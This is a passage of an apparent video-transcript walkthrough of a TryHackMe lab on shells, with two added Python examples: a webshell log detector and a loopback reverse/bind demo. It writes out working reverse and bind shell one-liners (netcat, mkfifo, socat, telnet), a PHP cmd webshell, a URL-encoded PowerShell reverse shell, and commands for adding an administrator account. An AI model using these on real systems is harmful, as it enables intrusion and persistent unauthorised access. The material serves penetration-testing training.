can get a little confusing, but a good rule of thumb is that the more underscores you see, the more likely it's going to be a stageless payload; the more forward slashes you see, the more likely it's going to be a staged payload. Stageless, staged, stageless.

Multi/handler is a superb tool for catching reverse shells. You may remember the
multi/handler from our previous Metasploit lessons. It's essential if you want to use Meterpreter shells, and the go-to when using staged payloads. Fortunately it's relatively easy to use. Open Metasploit with msfconsole, you type use multi/handler and press enter; you are now primed to start a multi/handler session. Let's take a look at the available options using the options command. There are three options we need to set: payload, the LHOST and the LPORT. These are all identical to the options we set when generating shellcode with msfvenom: a payload specific to our target, as well as a listening address and port with which we can receive a shell. Note that the LHOST must be specified here, as Metasploit will not listen on all network interfaces like netcat or socat will; it must be told a specific address to listen with. When using TryHackMe this will be your tun0 address if you're using the TryHackMe OpenVPN. We set these options with the following commands: set payload, set LHOST and set LPORT, followed by the payload, the IP address and the port. We should now be ready to start the listener. Let's do this by using the exploit -j command, which tells Metasploit to launch the module, running as a job in the background. So the exploit -j command is essentially the same as just running exploit and then backgrounding the session using the background command after you've exploited; it's just a faster way of doing it. You may notice that in the above screenshot Metasploit is listening on a port under that 1024 port; to do this Metasploit must be run with sudo permissions. When the staged payload generated in the previous task is run, Metasploit receives the connection, sending the remainder of the payload (because remember, this is a staged payload) and giving us a reverse shell. Notice that because the multi/handler was originally backgrounded, we needed to use sessions 1, the number one, to foreground it again. This worked as it was the only session running; had there been other sessions active we would have
needed to use sessions to see all the active sessions, then use sessions <number> for the line to select the appropriate session to foreground. This number would have also been displayed in the line where the shell was opened; see "Command shell session 1 opened".

What command can be used to start a listener in the background? That's going to be the -j command, or exploit -j. You can also just use the background command, but this is when we're actively exploiting it, before we actually run the exploit. If we had just received our 10th reverse shell in the current Metasploit exploit session, what would be the command to use to foreground it? Well, remember, zero is actually the first one that's used for a session, so it's actually going to be 0 through 9 if we have 10 sessions, so we'll go ahead and do sessions 9. Nice job. Once again, some of that would have been review, especially if you've gone through the Meterpreter lesson, so I appreciate you guys walking through this with me. Go ahead and jump to the next task.

There are times when we encounter websites that allow us an opportunity to upload, in some way or another, an executable file. Ideally we would use this opportunity to upload code that would activate a reverse or bind shell, but sometimes this just isn't possible. In these cases we would instead upload a webshell; see the Upload Vulnerabilities room for a more extensive look at this concept. Webshell is a generic term for a script that runs inside a web server, usually in a language such as PHP or ASP, which executes code on the server. Essentially, commands are entered into a web page, either through a HTML form or directly as arguments in the URL, which are then executed by the script with the results returned and written to the page. This can be extremely useful if there are firewalls in place, or even just as a stepping stone into a fully fledged reverse shell or bind shell. As PHP is still the most common server-side scripting language, let's have a look at a simple code example in a very basic
one-line format. We have the php echo, the <pre>, shell_exec, the cmd, and the closing </pre>. Now that may sound like a bunch of gobbledygook, but it is PHP, which is the most common server-side scripting language. This will take a GET parameter in the URL and execute it on the system with shell_exec. Essentially what this means is that any commands we enter into the URL after the ?cmd= will be executed on the system, via Windows or Linux. The <pre> elements are to ensure that the results are formatted correctly on the page. Let's see this in action, and you can see in the example they show the IP address /uploads/shell.php?cmd=, so anything after that ?cmd= will be executed on the target system, regardless of whether it's Windows or Linux; it's not discriminatory here, guys, it wants to get that reverse shell on the web. Notice that when navigating to the shell we use a GET parameter cmd with the command ifconfig, which correctly returned the network information of the box. In other words, by entering the ifconfig command, used to check the network interfaces on a Linux target, into the URL of our shell, it was executed on the system with the results returned. This would work for any other command we chose to use, for example whoami, hostname, arch, etc. As mentioned previously, there are a variety of webshells available on Kali by default; we have the /usr/share/webshells directory, also the infamous PentestMonkey php-reverse-shell, a full reverse shell written in PHP. Note that most generic language-specific (for example PHP) reverse shells are written for Unix-based targets such as Linux web servers; they will not work on Windows by default. When the target is Windows, it's often easiest to obtain RCE using a webshell, or by using msfvenom to generate a reverse or bind shell in the language of the server. With the former method, obtaining remote code execution is often done with a URL-encoded PowerShell reverse shell; this would be copied into the URL as the cmd argument.
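The cmd-parameter webshell just described also leaves a recognisable trail in the web server's access log. As an added example (not from the video or the TryHackMe room), here is a small Python detector that parses constructed Apache-style log lines, flags scripts requested from the /uploads/ directory, and URL-decodes the cmd parameter so an analyst can read the command that was run, including an encoded PowerShell one-liner; the log lines, IP addresses, upload path and marker list are assumptions made for the example.

```python
"""Added example, not from the video or the TryHackMe room: flag webshell
activity in web server access logs. It looks for scripts executed from the
upload directory and for the "cmd" GET parameter used by the one-line PHP
shell, and URL-decodes that parameter so the command (including an encoded
PowerShell one-liner) is readable. All log lines, addresses and paths below
are constructed for the example."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" log format: client, identity, user, timestamp,
# request line, status and response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

UPLOAD_DIRS = ("/uploads/",)          # where the practice box stores uploads (assumed)
CMD_PARAMS = ("cmd",)                 # GET parameter read by the one-line PHP shell
SCRIPT_EXTS = (".php", ".phtml", ".asp", ".aspx")
# Substrings that betray the reverse-shell one-liners covered in this walkthrough.
SHELL_MARKERS = ("powershell", "/bin/bash", "/bin/sh", "nc ", "socat ", "mkfifo")

# Constructed sample log: one benign request, three cmd= requests (the last one
# carrying the start of a URL-encoded PowerShell one-liner) and a direct hit on
# an uploaded PHP reverse shell.
SAMPLE_LOG = """\
10.10.95.52 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512
10.10.135.249 - - [01/Jan/2024:10:00:05 +0000] "GET /uploads/shell.php?cmd=ifconfig HTTP/1.1" 200 1043
10.10.135.249 - - [01/Jan/2024:10:00:09 +0000] "GET /uploads/shell.php?cmd=whoami HTTP/1.1" 200 88
10.10.135.249 - - [01/Jan/2024:10:00:20 +0000] "GET /uploads/shell.php?cmd=powershell%20-c%20%24client%3DNew-Object%20System.Net.Sockets.TCPClient HTTP/1.1" 200 0
10.10.95.52 - - [01/Jan/2024:10:01:00 +0000] "GET /uploads/ HTTP/1.1" 200 2048
10.10.95.52 - - [01/Jan/2024:10:02:00 +0000] "GET /uploads/php-reverse-shell.php HTTP/1.1" 200 0
"""


def parse_line(line):
    """Split one combined-format log line into fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # parse_qs percent-decodes each value once (so %20 -> space, %24 -> $).
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def classify(entry):
    """Return the reasons a request looks like webshell use (empty list = nothing seen)."""
    reasons = []
    path = entry["path"]
    if any(path.startswith(d) for d in UPLOAD_DIRS) and path.lower().endswith(SCRIPT_EXTS):
        reasons.append("script executed from upload directory")
    for name in CMD_PARAMS:
        for value in entry["query"].get(name, []):
            decoded = unquote(value)  # second pass catches double-encoded payloads
            reasons.append(f"command parameter {name}={decoded!r}")
            hits = [mk for mk in SHELL_MARKERS if mk in decoded.lower()]
            if hits:
                reasons.append("reverse-shell one-liner markers: " + ", ".join(hits))
    return reasons


def scan(log_text):
    """Return (client ip, timestamp, path, reasons) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append((entry["ip"], entry["ts"], entry["path"], reasons))
    return findings


if __name__ == "__main__":
    for ip, ts, path, reasons in scan(SAMPLE_LOG):
        print(f"{ts} {ip} {path}")
        for r in reasons:
            print("    -", r)
```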
Here we have a big list, which is the argument. Now this may seem like a fairly big command, and it is; if you go back to task 8 that was the original command, but it's been URL-encoded to be used safely in a GET parameter, thus why you see all the percentage signs. Remember that the IP and port in the bold towards the end of the top line will still need to be changed in the above code example, which was something that also needed to be filled in in the task 8 code example.

Okay, so let's say we have a shell. Now what? We've covered lots of ways to generate, send and receive shells. The one thing that all of these have in common is that they tend to be unstable and non-interactive. Even Unix-style shells, which are easier to stabilize, are not ideal. So what can we do about this? On Linux, ideally we would be looking for opportunities to gain access to a user account. SSH keys stored at /home/<user>/.ssh are often an ideal way to do this. In CTFs, or capture-the-flags, it's also not infrequent to find credentials lying around somewhere on the box. Some exploits will also allow you to add your own account; in particular something like Dirty COW or a writable shadow or passwd file would quickly give you SSH access to the machine, assuming SSH is open, and let's be honest, that may be a big assumption. It's sometimes possible to find passwords for running services in the registry; VNC servers, for example, frequently leave passwords in the registry stored in plain text. Some versions of the FileZilla FTP server also leave credentials in an XML file at C:\Program Files\FileZilla Server\FileZilla Server.xml or C:\xampp\FileZilla Server\FileZilla Server.xml. These can be MD5 hashes or in plain text, depending on the version. Ideally, on Windows you would obtain a shell running as the SYSTEM user, or an administrator account running with high privileges. In such a situation it's possible to simply add your own account (in the administrators group) to the machine, then log in over RDP, telnet, WinExe, PsExec, WinRM, or any
number of other methods, dependent on the services running on the box. The syntax for this is as follows, and keep in mind this is for Windows systems: we have net user <username> <password> /add, and then net localgroup administrators <username> /add is also another command that you could use to add your own account in the administrators group to a machine. The important takeaway from this task is: reverse and bind shells are an essential technique for getting remote code execution on a machine; however, they will never be as fully featured as a native shell. Ideally we always want to escalate into using a normal method for accessing the machine, as this will invariably be easier to use for further exploitation of the target. Go ahead and click completed.

If you literally only do one example, just one, and you get something from that, that's good enough. If you get nothing from these lessons and you're just trying to get through these tasks, well, you're at least exposing yourself to these techniques and concepts; that's a step forward in the right direction, especially if you want to be a penetration tester, or at least see if you would be interested in being a penetration tester. Even if you're thinking, ah, I don't want to be a pen tester at this point, well, you're going to finish the series, because we finish what we started. Enough chit-chat, let's do this. All right, let's get to the action.

This room contained a lot of information and gave you little opportunity to actually put it into practice. The following two tasks contain virtual machines, one an Ubuntu 18.04 server and one a Windows server, each configured with a simple web server with which you can upload and activate shells. This is a sandbox environment, so there will be no filters to bypass, great. Login credentials and instructions for each will also be given, should you wish to log in to practice with netcat, socat or Metasploit shells. The remainder of this task will consist of shell examples for you to try out on the practice boxes. All
right, try uploading a webshell to the Linux box, then use the command nc <LOCAL-IP> <PORT> -e /bin/bash to send a reverse shell back to a waiting listener on your own machine. Let's go and try that now. So first things first, if you scroll down to the bottom you'll see that there's a Linux practice box and a Windows practice box. So for these questions we're going to use the Linux practice box. We'll go ahead and click the blue Start AttackBox button first, up at the top. This box attached to the task is an Ubuntu server with a file upload page running on a web server, so we'll be using this one for web shells. This should be used to practice shell uploads on Linux systems. Equally, both socat and netcat are installed on this machine, so please feel free to log in via SSH on port 22 to practice with those directly. The credentials for logging in are shell, and then the password is right there, TryHackMe with, uh, different letters and characters. And once that attack box is up and running, go ahead and click the green Start Machine button for that Linux practice box; that will give us a new IP address at the top right there, for active machine information. Now you may be thinking, uploading a webshell, I don't have an exploit for that. Well, they actually provide that; you'll see in the second question they say navigate to /usr/share/webshells/php, and there's a PHP reverse shell right there. So we're going to go ahead and go to that specific directory within the Linux system: we do a cd into /usr/share/webshells/php and then we will do a quick ls, and voila, we have the exploit right there. But we need to do some modifications first. We are going to, as the question directs us to, change the IP address and port to match the tun0 IP with a custom port, uh, or we can just leave the port depending on what it is. We're then going to set up a netcat listener and then upload and activate that shell, and that will answer both question two and one. Now that
we've confirmed it's there, let's go to our desktop and copy that exploit to our desktop before we begin any modifications. To do that quickly we'll do cd /root/Desktop; that will take us to the desktop directory, and as you can see we have our desktop right there. Now we'll copy that exploit: we'll do a cp, the path of the exploit currently, which is /usr/share/webshells/php/, the name of the exploit, which is also listed in that second question there, php-reverse-shell.php. Don't press enter just yet; do a space, and then we're going to do a dot, indicating that we want that file copied to our current directory, which is the desktop. Press enter, and then if we do ls now we'll see that that PHP reverse shell has been successfully copied to the desktop. If you check your desktop you should see it popped up right there, and you could use whatever text editor you like here. I'm just going to double click, and it looks like it opens up in the default Pluma application; you can also use Sublime Text, vi or nano. And we're going to change the IP address, not to that IP address that just populated for the Linux shell practice, that attack machine IP address; it's going to be the one for our box, the TryHackMe box, so it'll be up at the top of your screen in the top right-hand corner, this one right here. So we'll keep the single quotes in there, but we're going to put in the IP address 10.10.135.249; yours is going to be different than mine, make sure you double check that IP address, so it's the attack box that we're going to be using for this PHP reverse shell. Once that is done, go ahead and press save, and we can close that file. Now we will set up the netcat listener and upload and activate the shell on the Linux machine, and they actually give us the command for this in the first question, so these two questions complement each other: the nc <LOCAL-IP> <PORT> -e /bin/bash, to send their reverse shell back to a waiting listener on our machine, our own machine. So now, to set up the
netcat listener, do netcat, or nc, and then the local IP address. So this is going to be the IP address of the attack box, not the one that was populated for the Linux machine that was right there; it's going to be the one at the top in the upper right-hand corner for that attack box, the same one that should be seen in the terminal. As you can see, mine is 10.10.135.249, so we're going to do 10.10.135.249; once again, that's going to be our attack box IP address, because we're going to connect back to it for the netcat listener. And then we will type in -lvnp for the options there, and then on port 1234, and press enter; same port as in that script, or the exploit, for the PHP reverse shell. As you can see, that is successfully listening on our IP address for the port 1234, so we're ready for that netcat listener. Now, you may not know this, but the Linux machine that we activated is actually the vulnerable web server, so if we type http:// and then that IP address that was populated right there at the top left-hand corner of the screen for the active machine information, mine's 10.10.95.52 for the Linux shell practice, it should pop up with the page, Linux Practice Webshell right here. This is a simple page to practice file uploads; all files will go to the /uploads directory; no filters are in place. So make sure that it does not change to https... oh my gosh, a whole squadron of planes passing by, that is cool. And if you get an error, make sure that it's not changing to https; it's staying at the http:// then the IP address of the Linux machine. So now we're going to perform the file upload: we'll click the browse button, which is going to take us to the desktop, which is where our reverse shell PHP file is, and once it's selected we'll go ahead and click open and submit. File has been successfully uploaded, nice job, and they give us the directory position of that PHP file: /uploads/php-reverse-shell.php. So you can click on that or type in the whole thing, and then it'll take you to that file, or you can just do the /uploads and then that will take you to the uploads page, and you can see the parent directory; the PHP reverse shell has been successfully uploaded. Now you can see our reverse shell is listening because we clicked on that PHP reverse shell. Now, when you click on that file you may not see anything directly happen, but you may see, by the "Index of /uploads" name, there's actually a small dot that's moving back and forth; that indicates that the shell has started, that the connection has been made. And if we look at our terminal we'll see that, yes, the netcat listener has created a session. Nice job.

So when you look at the shell, you'll see that it's actually /bin/sh, which is shell. This first question actually asked for the /bin/bash shell, so slightly different. To do that, it's pretty simple: let's open up a new terminal and we'll start a new netcat listener. We'll do nc -lvnp, but for the port we'll choose a different port, uh, say 777, and then press enter; you can see that we are listening on that port. Now you may notice that we did not specify an IP address; we just typed in netcat, the options, and then the port number. If we actually look, it's listening on 0.0.0.0; that just means it's a wildcard, it can be pretty much any port on this system, so that'll work as long as it's using that port 777. Now, in the shell we use that command in the first question, which includes the /bin/bash, so we'll do nc, then the local IP address, which is the same IP address that we've been using thus far, the one at the very top in the upper right-hand corner there, 10.10.135.249; yours is different than mine, make sure you double check that, not using the, uh, Linux IP address right there. Then we will go ahead and do the port, which is going to be 777, using a different port indicating a different shell, and then we're going to type the -e, for execute, /bin/bash, and press enter. As you can see, the connection
has been received successfully, woohoo! So there you guys have it: we have successfully done not just one shell, we've actually successfully completed two reverse shells, web shells. Give yourselves a pat on the back. We'll go ahead and click complete on that, and click completed on that second one, and we'll go to the next question.

"Log into the Linux machine over SSH using the credentials in task 14. Use the techniques in task 8 to experiment with bind and reverse netcat shells." All right, this should be fun. We'll go ahead and basically just SSH into it, so we have the credentials right here. Go ahead and clear out of that (you can press Ctrl+C, or Command+C if you're on the Mac) and go ahead and ssh, the name of the user, which is going to be shell, @ the IP address, and that IP address is going to be at the top, the populated Linux IP address for that attack target, 10.10.95.52. Make sure you have the dots in there, then press enter. We'll say yes to connect, and then we will type in the password. The password is right at the bottom in task 14: capital T, r, y, capital H, the number 4, lowercase c, k, uppercase M, the number 3, press enter, and remember to have the exclamation mark at the end. All right, success; you should be greeted by the shell practice prompt.

So now let's go back to task 8, Common Shell Payloads, and they said just to use the techniques here for bind and reverse shells, so they're being pretty vague. If we look at task 8 we can actually see that we've already run this command, nc -lvnp <port> -e /bin/bash. Now, we already used this command, nc -lvnp <port> -e /bin/bash, to create that bind shell on the target, the web shell, so you could already move on to the next question if you wanted to. We're going to try one more method, which is actually creating a pipe. So we'll take this command, the mkfifo command; we'll go to our handy dandy clipboard, copy it into the clipboard, and once we've SSHed into the system we'll paste it in. There it is, and there's actually one thing that we'll change, which is the port. As you can see it's just the brackets and then port; we'll take out the brackets, to make sure that the data flows correctly. If we don't take out the brackets then the data won't flow correctly and the web shell will not work. Go ahead and type in the port number, which is going to be 8080; you can use whatever port number you'd like, I'm going to use 8080. So we'll take out the brackets with the port, but we'll keep the bracket in between the port and that /tmp/f directory, the rest of the command; that way the data will flow properly. Then we'll go ahead and press enter. "Listening on any IP address on that port 8080": that's a good sign. Okay, so it's listening, and this is the listener, nc -l, l for listening.

We're going to go into the other terminal, clear that out, and we can use the up arrow to use the previous command, netcat, but we're going to make sure we're using the IP address of that Linux box. So that's the same IP address over here, instead of our attack box; that's going to be the one in the upper left hand corner, the one that was populated for the Linux box, because this SSH session is the Linux machine. As you can see, that's the same IP address as the session, so we're connecting to it from our attack box. We'll change that from 10.10.135.249 to 10.10.95.52, we'll go ahead and get rid of the options and the port, so we have netcat, the IP address, and then we're actually going to have no options, and then the port is going to be 8080. Press enter and you'll see that automatically the shell SSH session pops up with an unknown IP address. We have a successful piped shell, congratulations guys. Not that intuitive, or easy I should say, but it is just a different method to create a reverse shell, a web shell, using netcat.

Now you may be confused; you're saying, "Brock, I don't see anything happening, it's just blinking on the screen. Does that really mean... I mean, it's not connected, right? I don't have a reverse shell." Well, yes you do. If you actually type ls you'll see... well, nothing happens. Well, that's because you have to type whoami; you'll see that the user actually is shell, which means that we do have that reverse shell. So it's a little confusing. After performing that netcat connection we transfer to the shell directory within the Linux box. If you type cd .. to go up a directory and then type ls, you'll see that shell directory. If we type cd .. again and then do an ls, you'll see all of these directories, which means that there's actually a lot more on this machine than the default shell directory. So you can see, when we created that netcat session we were not the root user for the attack box, we were the shell user for the Linux box, and you can see all the files and directories right there. So we did successfully create a reverse web shell using the pipe method. There are different methods to use, such as the socat method, which we'll tackle next. You can click completed on that.

"Practice reverse and bind shells using socat on the Linux machine. Try both the normal and special techniques." So we'll Ctrl+C to stop that piped reverse shell and we will go to Use socat, task 6, and we'll use some examples from here. We'll go ahead and steal this command from the reverse shell section right at the bottom: socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li". It's the one right before the bind shells section for task 6, socat. We'll go ahead and copy that into the clipboard and paste that into our SSH... oh, I pasted that in and it actually went ahead and ran. Ctrl+C. To copy from the clipboard, we'll go ahead and close the clipboard, Ctrl+V, we paste that in. We don't want to run it just yet; we have to change the IP address. That's the local IP address, so this is going to be what it's connecting back to, and that's going to be our attack box IP address, so the IP address up there at the top. We'll take out the brackets and put 10.10.135.249; once again, that's going to be that IP address at the top, upper right hand corner of that attack box
screen. Then we will change the port; we'll use port 1234, you can use whatever port you'd like, and then we'll keep the EXEC:"bash -li". So if we execute this command it will connect to our listener, but we haven't set up the listener yet. Let's go ahead and do that now. We'll switch to our other terminal... what, I extended the... okay, so it looks like we got that error message saying that the time was up for the machine, but it looks like everything is still running, so I'm just going to go with it. We'll go ahead and Ctrl+C to stop that netcat session, we'll clear that out, and to start the listener on our attack box, that's actually going to be the first command they give us right there in the reverse shells section of task 6: socat TCP-L:<PORT> -, the port with the space and dash at the end. So we'll go ahead and type that out, socat TCP-L: and then the port, which was port 1234, and then a space and a dash, and press enter. Now the cursor is just a solid white; it may seem like nothing's happened. Let's go ahead and execute the socat reverse shell connection from the SSH Linux box; press enter on that command, flip back over to this one. Now it may not look like anything's happening, but the cursor is blinking, indicating that a reverse shell connection has been established. If you do happen to have problems, go ahead and change the port from 1234, or any previous port that you used, and try a new port. If you use a new port like 443 (HTTPS), TryHackMe won't get bogged down or confused by any previous ports or IP addresses that you have used in this lesson, so that will solve that dilemma. The way to tell if the shell is working properly is to run a command, so type in ls and you'll see ls on that Linux box, on the SSH session, pop up. If we type in whoami, the shell user pops up, and any commands that we type in and press enter on within this socat TCP session are actually being directly run on that Linux box, on that SSH session.

So in the same question they say to do a reverse shell and a bind shell using socat. We have done the reverse shell, which is just the target machine connecting back to the attacking box machine; a bind shell is just the opposite. So let's start the listener on the attacking box. Press Ctrl+C to stop that reverse shell TCP socat session, and we'll go to the socat task 6 to look at the syntax; right after the reverse shells is the bind shells syntax, and we'll copy that first command: socat TCP-L:<PORT> EXEC:"bash -li". We'll go ahead and paste that in there, and make sure you're using the commands for the Linux system, this is not Windows. We'll change the port in this case to 443, which will represent an HTTPS bind shell, then we will press enter, and it looks like it did successfully start that socat listener. So now we'll connect back to it from the target, and I know it sounds like a reverse shell because we're connecting back to it, but this is actually just us connecting to the socat listener. This could have been something that was created days or even weeks in advance of us gaining access to this target system, but because of course we're in a sandbox environment, this is all set up to work pretty instantly, so we're able to just create that socat listener and then use the target to type the second command, which, regardless of whether it's Windows or Linux, is this command: socat TCP:<TARGET-IP>:<TARGET-PORT> -. It seems to have pasted my last copied item, so we'll get rid of that at the end there with the bash -li, and we will leave the socat TCP:, the target IP (not the local IP, it's the target IP), which in this case will be our attack box IP address, that one up at the top there, 10.10.135.249, and then the target port, which is going to be the one that we specified in the socat command, which was 443, so we'll do 443. Then don't press enter just yet; do a space and then make sure the dash is there at the end, and press enter. If we look back on our attack box, it seemed to have errored out, but let's check this out: do an ls and you can see we have the files listed in that directory. What directory are we in? Let's run a pwd: /root/Desktop. And you can see those commands being run directly on your machine, pretty cool, right? So now you can kind of see the difference between reverse shells and bind shells; it's basically the same thing, it's just where the shell is coming from, but there's still always going to be a listener and a connection, and that's what makes it a shell. So you can click complete on that. Nice demonstration of your skills.

"Look through PayloadsAllTheThings and try some of the other reverse shell techniques. Try them and see why they even work." Okay, so we have to do a little reading. If you actually click on that link it will open a new tab, and we can see that we're directed to the GitHub repository PayloadsAllTheThings, which is located in the swisskyrepo repo, and you can see that there's a number of modules here. If you scroll down on the PayloadsAllTheThings page you'll see some different examples of reverse shells. You'll see the netcat shells; these are shells that we have used throughout this lesson. You'll also see the PHP shell examples; this is what we used with the web shell, or the reverse shell. Since this is a Linux system we cannot use the PowerShell reverse shell. Let's try the telnet example: on the attacker machine we start two listeners using the netcat command, nc -lvp, and two different ports, 8080, and they use 8081. Now on our attack box we run that command, nc -lvp (you might as well do -lvnp, the full options available), and then we'll do port 8080, press enter. Open up another terminal tab and we'll do the same command, nc -lvnp, but we will do a different port, port 8081, press enter. Now we have two netcat listeners, but it's the same attack box using different ports. That prompt appears on the desktop: it's listening on any IP address with port 8081. For some reason on the other tab the prompt didn't appear, but it is also listening, just on a different port, 8080. If we look back at the PayloadsAllTheThings
page, we'll see that the victim machine command is as follows. So the next step is to run this command on the victim machine, the SSH session for that Linux box. We'll go ahead and copy that, go ahead and clear that out, paste that in, and the command will start right at telnet, and then we'll put in the IP address of the attack box that we will be connecting back to over telnet; that is going to be the one at the very top there, so 10.10.97.99. My IP address did change because I had to restart my attack box, so there's a new IP address. Then we have 8080, we do the pipe, /bin/sh (you can also do a bash shell by changing the sh to /bin/bash if you would like to), and then we'll do another pipe; we're piping multiple commands into this one telnet command: telnet and then your IP, so this is going to be the same IP address, get rid of those brackets, 10.10.97.99, and 8081. So basically we're creating two reverse shells in just one command, pretty cool, right? It's a one-liner, so we go and press enter and you should see that it is connected to that IP address, the attack box IP address, and if you look on that listening machine you'll see bam, we have a reverse shell through telnet, and we also have a reverse shell on port 8081. So 8080 and 8081, boom, two birds, one stone. So now if we type ls from the shell practice, you'll see it pops up on that first port 8080 shell. If you do a pwd, print working directory, you'll see that it also pops up. As you can see, it works because netcat is installed on both machines, just like socat must be installed on both machines in order for this reverse shell to work. Go ahead and click completed on that, and we can go ahead and cross off that Linux practice box, task 14, because that is all the questions for the Linux box.

Now, it will not be that easy in real life. This is a sandboxed environment; these things are set up for us. There's really no regulations, no firewalls, all the ports are open, so it's pretty much a piece of cake. Yes, there will be websites that allow you to upload files, but there will certainly be rules in place in order to detect malicious files so that payloads aren't executed. In addition to that, there are also safeguards, not only at the firewall level that close off ports, so you might have trouble finding an open port that will actually work; there are also protections in place to detect malicious files being run and reverse shells or bind shells actually occurring. Nonetheless, reverse and bind shells are a good topic to learn as a penetration tester.

So let's check out the Windows side of things; we already checked the Linux side. "Switch to the Windows VM. Try uploading and activating the php-reverse-shell. Does this work?" So now it's actually a good time to terminate your current attack box machine instead of extending; this will give you more time if we start a brand new attack box. So we'll click the blue start attack box button once that has been terminated, we'll go ahead and terminate the Linux attack machine and scroll down to task 15. Go ahead and wait until that attack box initializes, then click the green start machine button. This task contains a Windows 2019 Server box running on a XAMPP web server; this can be used to practice shell uploads on Windows. Again, both socat and netcat are installed, so feel free to log in over RDP or WinRM to practice with these. The credentials are the administrator and then that same password as for the Linux box, and then they also give us the example command to log in using RDP. Since our attack box has initialized, we'll go ahead and click the green start machine button to start that Windows practice box. Once that IP address is populated we'll go ahead and copy it, paste it into a web browser, and we'll see that it opens up a new vulnerable web page. It looks like we can upload a malicious file, similar to the Linux box. Now, in the Linux box the php-reverse-shell is located in the /usr/share/webshells/php directory; let's go ahead and check that on the Windows box to see if it's there.
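The reverse versus bind comparison made in the Linux section above, as an added example that is not from the video or from TryHackMe: a loopback-only Python sketch in which a one-line upper-casing service stands in for the shell, showing that both layouts are one listener plus one connector and differ only in which side listens. The firewall_view helper is an assumption of mine, not a tool the room uses.

```python
"""Reverse vs bind: which side listens.

Added example, not from the video. The 'shell' here is a stand-in that only
upper-cases one line, so everything runs safely inside one process on
loopback. Both layouts have exactly one listener and one connector; the only
thing that changes is which box plays which role.
"""
import socket
import threading

HOST = "127.0.0.1"  # loopback only; both "boxes" live in this process


def fake_shell(conn):
    """Stand-in for `-e /bin/bash` or `EXEC:"bash -li"`: answer one command."""
    with conn:
        cmd = conn.recv(1024)
        conn.sendall(cmd.upper())


def _listener():
    """Open a listening socket on a free port; returns (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((HOST, 0))  # port 0: let the OS pick a free port
    srv.listen(1)
    return srv, srv.getsockname()[1]


def reverse_shell_layout():
    """Reverse shell: the operator listens (nc -lvnp <port>); the target
    connects OUT to it and serves its shell over that connection."""
    srv, port = _listener()  # operator side: the waiting listener

    def target():
        # target side: outbound connection, then the shell talks over it
        with socket.create_connection((HOST, port)) as s:
            fake_shell(s)

    t = threading.Thread(target=target)
    t.start()
    conn, _ = srv.accept()  # operator accepts the connection that came in
    with conn:
        conn.sendall(b"whoami\n")
        reply = conn.recv(1024)
    t.join()
    srv.close()
    return {"listens": "operator", "connects": "target", "reply": reply}


def bind_shell_layout():
    """Bind shell: the target listens (socat TCP-L:<port> EXEC:"bash -li");
    the operator connects IN (socat TCP:<target-ip>:<port> -)."""
    srv, port = _listener()  # target side: a port opened on the target

    def target():
        conn, _ = srv.accept()  # target waits for the operator to connect
        fake_shell(conn)

    t = threading.Thread(target=target)
    t.start()
    with socket.create_connection((HOST, port)) as s:  # operator connects in
        s.sendall(b"whoami\n")
        reply = s.recv(1024)
    t.join()
    srv.close()
    return {"listens": "target", "connects": "operator", "reply": reply}


def firewall_view(layout):
    """Hypothetical helper: which traffic direction a network control would
    have to allow. A reverse shell is outbound from the target, so egress
    filtering catches it; a bind shell needs an inbound port open on the
    target, so inbound filtering catches it."""
    if layout["connects"] == "target":
        return "egress from target"
    return "ingress to target"


if __name__ == "__main__":
    for name, fn in (("reverse", reverse_shell_layout), ("bind", bind_shell_layout)):
        result = fn()
        print(name, result, "->", firewall_view(result))
```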
We'll go ahead and do cd /usr/share/webshells/php and then press enter, then do an ls, and we can see that we do have that php-reverse-shell.php. Of course this file is going to be for the Windows page, or the Windows vulnerable web page. So let's go back to the desktop: we'll do cd ~/Desktop, press enter, and then if we do an ls we will see that we have successfully transferred to the desktop. Then we'll do a copy to copy that file: cp /usr/share/webshells/php/ and the name of that file for the PHP reverse shell, it's going to be php-reverse-shell.php, do a space and then do a dot to indicate we want that file copied to the desktop, press enter. Now if we check our desktop we'll see that the file successfully copied to the desktop. Now we'll go into that file and we will change the IP to our attack box IP, the one at the top right there, 10.10.25.75, and we'll keep the port 1234. Go ahead and save that; now we'll exit. Once that's saved we'll go back to the browser and upload that file from our desktop, so we'll click that, click upload and submit, and the file has been successfully submitted. We can do a /uploads and we'll see in that directory the php-reverse-shell file has been successfully uploaded. So after that file is uploaded we'll go ahead and activate it to see if it's actually going to create a reverse shell. We'll create a netcat listener by using nc -lvnp and use that same port that was in the file that you changed it to, we'll do 1234, then back on the index we'll go ahead and click that file within the uploads. So it looks like a shell was not created, so we're going to go ahead and click completed on that.

"Upload a web shell on the Windows target and try to obtain a reverse shell using PowerShell." So this represents a realistic scenario: you upload a malicious file, it doesn't recognize it when you try to run it, and there may be precautions or rule sets in place to make sure that malicious files are not run. Now if we go back to task 11, Webshells, we're going to replicate this web browser action to create a reverse shell using the browser tab, or the browser search bar. Right after /uploads/ we will type in the name of that file that we uploaded to the server, and that is going to be right there in the uploads directory, so it's going to be php-reverse-shell.php, it's the same name as the file, I didn't change it, and then after that we simply do /shell.php. So once we've called out where that file is in the directory, we do a ?cmd=, and remember, whatever we type after the ?cmd= will be executed on the machine. So now we'll use that big command that they actually URL encoded, so we don't have to worry about encoding; we'll copy that whole thing, and this will give us a PowerShell reverse shell, pretty cool, right? So we'll copy that long command, paste it into the clipboard, and they've done all the hard work for us; we just need to change the port and the IP address. Right where the brackets are in the upper right hand corner of the clipboard we will delete that port and the two brackets and then we'll type in the port of your choice; I'll use port 1234. Then the IP address is right to the left of that, after some percent signs and numbers, and we will take out the brackets as well and type in the IP address of that attack box, so that's going to be at the very top of your attack box right there, 10.10.25.75 for me. Once we have that, there's nothing else we need to change, so we'll copy, then right after the equals sign we'll go ahead and Ctrl+V. cmd= means we're going to pass that argument to be executed 